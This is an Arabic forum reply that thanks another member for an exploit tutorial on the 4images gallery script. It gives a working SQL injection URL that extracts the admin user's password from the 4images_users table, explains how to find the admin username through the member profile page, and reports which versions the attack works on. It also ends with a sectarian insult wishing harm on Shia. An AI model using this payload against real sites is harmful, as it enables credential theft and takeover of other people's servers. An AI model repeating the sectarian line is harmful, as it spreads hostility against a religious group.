مشكووور اخي اكس بي على الشرح الحلوووو
والله فكره حلوه صحيح ..
بس عندي مداخله ياريت تقبلها مني ..
اولا : عند طرح الاستغلال بعد مجلد السكربت في الاخير يوجد كلمه
admin ..
search.php?search_user=x%2527%20union%20select%20u ser_password%20from%204images_users%20where%20user _name=%2527
admin
وهذه
admin متغيره من سكربت الى اخر .. على حسب مزاج صاحب السكربت ...
ويجب ان تحط اسم الادمن بعد التغيير لو كان مغير الاسم صاحب السكربت ..
ونعرف اسم الادمن بهذا الرابط .. نحطه بعد المجلد مباشره
member.php?action=showprofile&user_id=1
مثل
www.site.com/4image/member.php?action=showprofile&user_id=1
وبهذا يطلع لك اسم الادمن
ولنفرض كان اسمه
heartlord83
بيكون الاستغلال كالتالي
search.php?search_user=x%2527%20union%20select%20u ser_password%20from%204images_users%20where%20user _name=%2527
heartlord83
ثانيا : انا جربت الطريقه على الاصدارات 4images 1.7.1 وعلى 4images 1.7.2 والحمد لله تماااااام التماااااااااااااام
ولكنها لا تصلح للاصدارات 4images 1.7.3 ولا للاصدارات 4images 1.7.4 فما العمل اخي اكس بي ؟؟؟
ولك اسمى تحيااااااتي استاذي القدير
XP والله ينور لك دربك .. ويطرح بيدك كل الشيعه .. تنثرهم وتشوتهم على واحد واحد ...
والله معك واحنا معك ..
اخوك
هارت لورد
.